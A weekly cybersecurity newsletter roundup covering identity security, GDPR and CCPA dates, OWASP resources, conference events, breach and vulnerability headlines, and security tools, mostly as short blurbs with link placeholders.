Security Stack Sheet #71

Word of the week

“Identity is the new perimeter”

Image result for identity perimeter comic

“I have a dream” not quoting Martin Luther King or ABBA for that matter but most CIO’s or CTO’s in this case.

Is there a position to discuss the Cloud Access Security Broker, the positioning of the firewall inspecting outbound traffic as well as the position for Secure internet gateways? Certainly, however, let’s walk before we run. There is a solid argument that in the presence of the three focus areas implemented maturely within an organisation, who understand their risks and have remediation plans for them, most risks become improbable.

Do not allow identity to evaporate your Cloud dream

Links HERE and HERE and HERE and HERE

Word of the week special

“Should we blame people for cyber security errors?”

In certain circumstances the responsibility of managing risk is thrown back upon the individual. Margaret Thatcher famously blamed a large proportion of Britain’s record level crime rates on the victims’ carelessness: ‘we have to be careful that we ourselves don’t make it easy for the criminal’

Image result for cyber error comic

Link HERE and Why Creating a Culture of Security Awareness is Crucial in Tackling Insider Threat is HERE

AND

“AgileFall” – When Waterfall Sneaks Back Into Agile

  • AgileFall is a seductive trap – using some Lean processes but retaining the onerous parts of Waterfall
  • The goal of leadership in Lean product management is not to push the paperwork down. It’s to push an outcome orientation down and translate its progress back up the chain

Link HERE

AND

Who is Responsible for Internet Architecture Security? 

Witnesses at a September 10 House Armed Services Committee Hearing on Securing the Nation’s Internet Architecture included Jeanette Manfra, Assistant Director for Cybersecurity at the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency; Diane Rinaldo, Acting Assistant Secretary and Administrator at the Department of Commerce’s National telecommunications and Information Administration; and Ed Wilson. Deputy Assistant Secretary for Cyber Policy at the Department of Defense’s Office of the Undersecretary of Defense for Policy. Committee Chairman Jim Langevin (D-Rhode Island) noted that while various agencies have laid claim to distinct aspects of cyber policy, there is no single entity that has responsibility for the security of Internet architecture and said, “I’m very worried that by carving out discrete lanes in the road, there are seams left unaddressed in the middle, and I’m concerned that internet architecture security is one of those seam issues.”

Link HERE

Bonus

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Thanks to Andi

If you missed this in the previous Sheet

Crypto challenge of the week

Starting Next Week!

A screenshot of a cell phone Description automatically generated

Link HERE Prepare yourself from HERE

 

Dates

  • May 25th 2019: 1 year of GDPR Live! See incidents section below

GDPR Enforcement Tracker

Link HERE – thanks to Marius

  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective

Image result for ccpa

Link HERE

  • June 30th 2018: TLS1.1 mandatory for PCI-DSS compliance  BEWARE!

Link HERE

  • Now: TLS1.2 mandatory for proper security

HTTPS everywhere HERE

  • Halloween Brexit! or later or not or bust

A screen shot of a person in a suit and tie Description automatically generated

AND

A close up of a sign Description automatically generated

Link HERE

  • September 2019: PSD2 security

PSD2 legislation will not fully come into full gear in every European country in September 2019

France has just postponed the application to 2022 (here from Banque de France, with approval there from the European Bank Authority); it’s not crystal clear but also seen in the French Financial press

UK has done the same but with an 18 months delay (here from the Financial Conduct Authority)

Germany similar situation… No source available.

Thanks to Christophe.

  • November 3rd 2020: Trump’s second term start
  • 2022 – First trip to Mars according to Elon Musk
  • 2024 – Back to the Moon according to Trump and NASA

Book of the month

Hacking Security e-books

Link HERE

Comic of the week

Image result for password manager comic

##Some OWASP stuff first

-Pushing Left, Like a Boss – Part 8: Testing

Testing can happen as soon as you have something to test.

Link HERE

-AppSec podcast: Brook Schoenfield — Security is a messy problem

Brook Schoenfield is a Master Security Architect @IOActive and author of Securing Systems, as well as an industry leader in security architecture and threat modeling, and a friend.

“We have a static analysis tool. Why do we need a program?” This is what Brook overheard at one point in his past, from a company CTO, and it sums up the program issue. The CTO was trying to drive a technical strategy for an entire company, and security was just one piece of that. A mandate or a tool would have made life so easy.

Brook takes us on a journey based on his experience building programs, with advice, stories, comments, and quotes. We talk about architecture, culture, mindset, tools, compilers and so much more.

Catch Brook’s next book, “Secrets of a Cyber Security Architect” which arrives in Fall 2019

Link HERE

-Remember: API Security Checklist

Checklist of the most important security countermeasures when designing, testing, and releasing your API

Link HERE and THE DARK SIDE OF APIS: DENIAL OF SERVICE ATTACKS Link HERE

-10 Java security best practices

Link HERE

A screenshot of text Description automatically generated

plus 5 Security Best Practices for Java HERE and for background the screenshot HERE

-Gartner: Application security programs coming up short

At the 2019 Gartner Security and Risk Management Summit, experts discussed how enterprise application security efforts are falling short and what can be done about it

Link HERE

Link HERE

Image

Link HERE

 

Events

OWASP events HERE

All InfoSec events HERE

The complete Security Events calendar – Peerlyst

Link HERE

OWASP London event 19th of September

  • “Hack the World & Galaxy with OSINT” – Chris Kubecka
  • Lightning Talk – “Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions” – Dinis Cruz
  • “Common API Security Pitfalls” – Philippe De Ryck

Link with video presentation and PDFs HERE

A close up of a sign Description automatically generated

Link HERE

Security BSides London 2019 – Bug Bounties: Crowdsourcing Nosey Bastards – Jamie O’Hare

Bug Bounties have emerged in recent years, marketed as a silver bullet solution to an organisation’s external security; however, there are hidden depths beyond publishing a scope. By the end of this talk (hopefully) you’ll be able to answer: Do more eyes necessarily mean the better? What are the intricacies to project-specific and non-project-specific hunters? And most puzzlingly what does the city of St Petersburg have to do with Bug Bounties?

Link HERE

How to secure app pipelines in AWS – 26th September 2019

Link HERE

Cyber security: Beyond the Headlines | 2019

Link HERE

 

Incidents

Global ALERT level

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 

A screenshot of a map Description automatically generated

Incident data HERE Find your country

A close up of a map Description automatically generated

NCSC Weekly Threat Report

Provided Image

Ecuador data breach affects millions

Ecuador suffered the biggest data breach in its history this week after the records of most of its population were exposed online.
The leak, which was reported by ZDNet, occurred after a data analytics company had left a server exposed without a password. This then meant that anyone could access the data.
The data included the personal information of 20.8m Ecuadorian citizens as well as financial and car ownership records

LastPass patches recent credentials vulnerability

LastPass, a freemium password manager, has released an update to fix a vulnerability which would expose credentials previously entered on a previously visited website.

The fix in LastPass’s version 4.33.0 was released last week and users should update to this version as soon as possible. LastPass also highlighted that the bug only affects Chrome and Opera browser extensions in a blog post

Link HERE

Troy Hunt newsletter

Link HERE

Incidents & events detail

Password-exposing bug purged from LastPass extensions

Google Project Zero finds and reports flaw in widely used password manager

Link HERE

CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins

From iwantmore.pizza

Link HERE

Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira

Link HERE

Web Attacks Focus on SQL Injection, Malware on Credentials

Attackers continue to focus on bread-and-butter tactics, according to a quarterly threat report

Link HERE

iOS 13 exploit bypasses the lockscreen for access to contacts

Security flaw should be fixed in iOS 13.1

Link HERE

AWS billing error overcharges cloud customers

Link HERE

A gentle introduction to Linux Kernel fuzzing – from Cloudflare

Link HERE

CafePress finally warns customers that it was hacked

Link HERE

1-Click iPhone and Android Exploits Target Tibetan Users via WhatsApp

iphone and android hacking

Link HERE

The Air Force Will Let Hackers Try to Hijack an Orbiting Satellite

At the Defcon hacking conference next year, the Air Force will bring a satellite for fun and glory

Link HERE

Digital Certificates – Models for Trust and Targets for Misuse

Blog 6: A new kind of certificate fraud: Executive impersonation

Link HERE

Mind Tricks CISOs Already Know — A Methodology for Delivering Effective Communication

Link HERE

Windows 10: Has Microsoft cleaned up its update mess? (Spoiler: Maybe)

After its botched release of the version 1809 update for Windows 10 last year, Microsoft instituted a sweeping series of changes to Windows Update. Don’t be fooled by the headlines: A close look at recent issues with version 1903 suggests those changes are paying off

Link HERE

Research of the week

Featuring Hype Cycle for Cloud Security, 2019

Security continues to be the most commonly cited reason for avoiding use of the public cloud, but consensus is growing that public cloud can be made secure enough for an increasing number of use cases. Mature cloud service providers (CSPs) are only very rarely suffering security failures that directly affect their customers; but customers of these services often do not yet know how to use them securely. The multiple security tools contained within this Hype Cycle strongly suggest that cloud-using organizations are not always finding CSP-provided security mechanisms to be adequate. Security professionals who can reorient their role around “business enablement” will find that their technical, conceptual and practical experiences make them ideally suited to help their organizations make controlled, compliant and economical use of the public cloud. This Hype Cycle provides a summary of the most important new mechanisms that will enable that mission

Link HERE

WOW: Write-up of DOMPurify 2.0.0 bypass using mutation XSS

Yesterday, a new version of DOMPurify (very popular XSS sanitization library) was released, that fixed a bypass reported by us. In this post I’ll show how exactly the bypass looked like preceded by general information about DOMPurify and how it works. If you are aware of how purifiers work and what mXSS is – you can skip directly to the paragraph mXSS in Chromium (and Safari)

Link HERE

2019 CWE Top 25 Most Dangerous Software Errors

Click for the rest

A screenshot of a social media post Description automatically generated

Links HERE and HERE

Deserialization Bugs in the Wild

A totally unscientific analysis of deserialization vulns found in the wild

Link HERE

Cloudflare’s Approach to Research

A screenshot of a cell phone Description automatically generated

Link HERE

Tool of the week

Introducing LambdaGuard — a security scanner for AWS Lambda

We’ve built a tool which allows you to visualise and audit the security of your serverless assets — and now we’re open-sourcing it, too

Link HERE

Best Free Tools for Online Privacy

Link HERE

Resource: Security Monitoring and Attack Detection with ElasticSearch, Logstash and Kibana

Link HERE and what can go wrong HERE

Remember:

A close up of a map Description automatically generated

Link HERE

Kubernetes security best practices

Link HERE

 

Other interesting articles

##Remember: Why you need a password manager

A screenshot of a cell phone Description automatically generated

Link HERE

 

##Different conferences, common theme: How to best manage the disparate security solutions we’re using

We need to unite the different islands of security solutions in both the physical and cyber worlds to provide the best level of protection

Link HERE and

Security Automation and the Coming Singularity is HERE and

Black Hat 2019: The Craziest, Most Terrifying Things We Saw is HERE

 

##JWT Exfiltration Optimization & Blind MySQLi

It was a bloody rainy day in the mid of 2013, when my teacher went over the term “Big O Notation” during the data structure class, back then in LIU university in Lebanon. I didn’t know that I’d fancy use it in my career, and I haven’t had the guts to use it then

Link HERE

 

##And finally, California Wants to Stop Hackers from Taking Control of Smart Gadgets

A proposed state law would help bolster the security of internet-connected devices, but what’s really needed is federal action

Image result for iot comic

Links HERE and HERE

AND

Ironically, Too Many Video Streaming Choices May Drive Users Back To Piracy

Link HERE

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://habr.com/en/post/466801/

Description: Bypassing LinkedIn Search Limit by Playing With API.

URL: https://leucosite.com/Microsoft-Edge-uXSS/

Description: Microsoft Edge – Universal XSS (uXSS) (CVE-2019-1030).

URL: https://www.komodosec.com/post/an-accidental-ssrf-honeypot-in-google-calendar

Description: An Accidental “SSRF” Honeypot in Google Calendar.

Link HERE and credits to HERE

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *